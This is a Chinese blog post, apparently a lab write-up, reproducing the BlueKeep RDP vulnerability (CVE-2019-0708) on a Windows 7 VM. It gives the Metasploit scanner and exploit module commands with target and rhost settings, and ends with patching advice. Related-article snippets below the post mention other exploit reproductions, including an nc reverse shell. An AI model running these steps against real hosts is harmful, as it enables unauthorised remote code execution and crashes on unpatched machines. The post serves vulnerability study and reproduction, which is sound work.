远程桌面代码执行漏洞复现(CVE-2019-0708)

已于 2023-06-29 21:25:23 修改
阅读量1.2k 收藏 6
点赞数 1
分类专栏: 漏洞复现 文章标签: CVE-2019-0708 远程桌面漏洞 漏洞复现
于 2020-06-24 17:53:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/106898107
版权

前言

最近在学习和复现漏洞,借此记录一下~~



目录导航

漏洞危害就不说了,你们都懂得,下面是漏洞的影响范围~~

CVE-2019-0708 漏洞影响范围:

Windows 7(已停止维护)
Windows Server 2008 R2
Windows Server 2008 Windows
Server 2003(已停止维护)
Windows XP(已停止维护)

漏洞复现环境:ed2k://|file|cn_windows_7_enterprise_x64_dvd_x15-70741.iso|3203516416|876DCF115C2EE28D74B178BE1A84AB3B|/


一. 漏洞探测

命令行输入msfconsole打开msf控制台,随后搜索cve-2019-0708漏洞利用模块,如下:

在这里插入图片描述

可以看到有auxiliary(辅助)模块和exploit(攻击)模块,而我们现在要使用的是模块一,用来进行对CVE-2019-0708的漏洞探测

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

在这里插入图片描述

扫描结果显示该主机很容易受到CVE-2019-0708的攻击,到此可进行下一步漏洞利用了。


二. 漏洞利用

接下来要使用rce漏洞利用模块,如不存在该模块,可尝试更新msf,如下:

msf更新:apt-get  install metasploit-framework
		gem install bundler

需要设置的options:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce  # rce漏洞利用模块
show targets 
set target 4  # 选择目标主机类型  这里这里要选择正确的target 不然会导致受害机蓝屏!!
set rhost 172.20.60.14 # 这里设置受害机
run

经过前前后后10多次的尝试,测试期间换了多个镜像文件和msf环境,实验结果仍旧是蓝屏… ,并未达到rec利用,最后尝试使用下面的镜像环境能完成复现实验。

ed2k://|file|cn_windows_7_enterprise_x64_dvd_x15-70741.iso|3203516416|876DCF115C2EE28D74B178BE1A84AB3B|/

失败的样子:
在这里插入图片描述
成功的样子:在这里插入图片描述


修复建议

1.更新漏洞补丁
2.使用杀软等专业的防护软件系统,毕竟人力有限,总不可能24小时盯着个人电脑或关键服务器,这时候,杀软等防护硬软件将会是我们的第一道防线

春日野穹ㅤ
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
RDP远程桌面漏洞复现(CVE-2019-0708)
谢公子的博客
09-07 5793
9.7号凌晨一点多,开发者 @rapid7在Github上放出了windows远程桌面服务RCE漏洞(CVE-2019-0708)的exp。一大早醒来,朋友圈就被各大公司安全预警给刷了屏,趁着上午,立马把该exp复现了一波。 漏洞影响Windows版本: Windows XP SP3 x86 Windows XP Professional x64 Edition SP2 Windows...
cve-2019-0708远程桌面代码执行漏洞复现
明哥哥知识分享
11-05 890
1.影响版本 Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP 2.漏洞描述 Microsoft Windows中存在远程桌面执行代码漏洞,该漏洞源于Microsoft Remote Desktop Services中存在输入验证错误漏洞,网络系统或产品未对输入的数据进行正确的验证。当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
2401_83946826的博客
04-16 1348
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
CVE-2019-0708 漏洞复现
最新发布
qq_40860153的博客
05-11 384
存在漏洞远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。4、可以看到攻击完成,但是没有成功创建会话,通过分析告警提示,是需要指定一下目标攻击框架,这里再设置一下攻击框架,再发起攻击就可以成功获取到会话了。攻击机:192.168.0.1。
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
冰恋云的专栏
07-14 1713
Microsoft: Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708) 解决办法:Microsoft 已经为此发布了一个安全公告(CVE-2019-0708)以及相应补丁: CVE-2019-0708: Microsoft Windows 远程桌面服务远程执行代码漏洞. 链接: https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-0708 ...
CVE-2019-0708远程桌面服务远程执行代码漏洞复现
Welcome To Myon'Blog !
12-22 1506
CVE-2019-0708 远程桌面服务远程执行代码漏洞复现
微软RDP远程代码执行漏洞(CVE-2019-0708)复现
m_ing
07-11 1498
漏洞详情 漏洞说明# 远程桌面是微软公司为了方便网络管理员管理维护服务器而推出的一项服务,网络管理员使用远程桌面连接程序连接到网络任意一台开启了远程桌面控制功能的计算机上 该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作 漏洞危害# 存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更
微软RDP远程代码执行漏洞(CVE-2019-0708)修复方法
子涵先生
07-24 4719
文章目录问题描述漏洞复现漏洞修复1、官网解答2、查看windows update 问题描述 微软RDP远程代码执行漏洞(CVE-2019-0708) 远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)是大部分的Windows都有客户端所需软件,RDP服务默认监听本机3389端口。 根据MSRC公告显示,本漏洞RDP服务远程代码执行漏洞,未经认证的
CVE-2019-0708:3389远程桌面代码执行扩展CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
02-05
微软3389远程漏洞CVE-2019-0708批量检测工具 0x001 Win下检测 https://github.com/robertdavidgraham/rdpscan C:\Users\K8team\Desktop\rdpscan-master\vs10\Release 的目录 2019/06/02 02:11 <DIR> . 2019/06/02 02...
RDP漏洞[+CVE-2019-0708+]无损扫描工具GUI.rar
05-21
最新CVE-2019-0708poc ,懂得来,不懂得就别来了,360火神团队写的poc,亲测好用,用于自建,无损检测
3389漏洞批量检测工具
01-17
3389远程桌面代码执行漏洞CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
windows RDP远程代码执行_CVE-2019-0708漏洞复现
weixin_48900801的博客
07-28 898
windows RDP远程代码执行_CVE-2019-0708漏洞复现 一、漏洞描述 Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。 微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者
Windows RDP远程桌面漏洞CVE-2019-0708复现
selecthch的博客
08-12 3527
事件背景 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。 影响范围 受影响的版本...
vulhub-CVE-2018-1273远程命令执行漏洞复现
m0_62008601的博客
09-23 1305
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
远程桌面代码执行漏洞cve-2019-0708
chaojixiaojingang
10-27 3904
1.影响版本 Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP 2.漏洞描述 Microsoft Windows中存在远程桌面执行代码漏洞,该漏洞源于Microsoft Remote Desktop Services中存在输入验证错误漏洞,网络系统或产品未对输入的数据进行正确的验证。当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称...
PHP 远程代码执行漏洞(CVE-2022-31625)修复办法
07-14
针对PHP远程代码执行漏洞(CVE-2022-31625),以下是一些修复方法: 1. 更新到最新版本:确保你的PHP版本是最新的,因为漏洞修复通常会包含在更新中。请访问PHP官方网站或者使用包管理工具来获取最新版本。 2. 禁用危险函数:在php.ini配置文件中,禁用危险函数可以帮助防止远程代码执行。可以使用disable_functions指令来禁用一些敏感函数,如eval()、exec()、system()等。 3. 安全配置:检查你的PHP配置文件,确保安全设置已经启用。例如,禁用动态加载扩展、限制文件上传目录和大小、禁用远程文件包含等。 4. 输入验证和过滤:在你的应用程序中对用户输入进行严格的验证和过滤,以防止恶意代码注入。 5. 使用安全框架或库:使用安全框架或库来帮助防止远程代码执行漏洞。这些框架通常提供安全的默认配置和内置的安全功能。 6. 定期更新和监控:定期检查并更新你的应用程序和相关组件,以确保及时修复已知漏洞。同时,监控应用程序的日志和网络流量,以便及时发现异常行为。 请注意,这些方法只是一些常用的修复措施,具体的修复方法可能会因系统配置和应用程序的特定情况而有所不同。建议在修复漏洞之前,先进行充分的测试和备份。此外,如果你不确定如何处理或无法解决该漏洞,请咨询安全专家或PHP开发人员的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值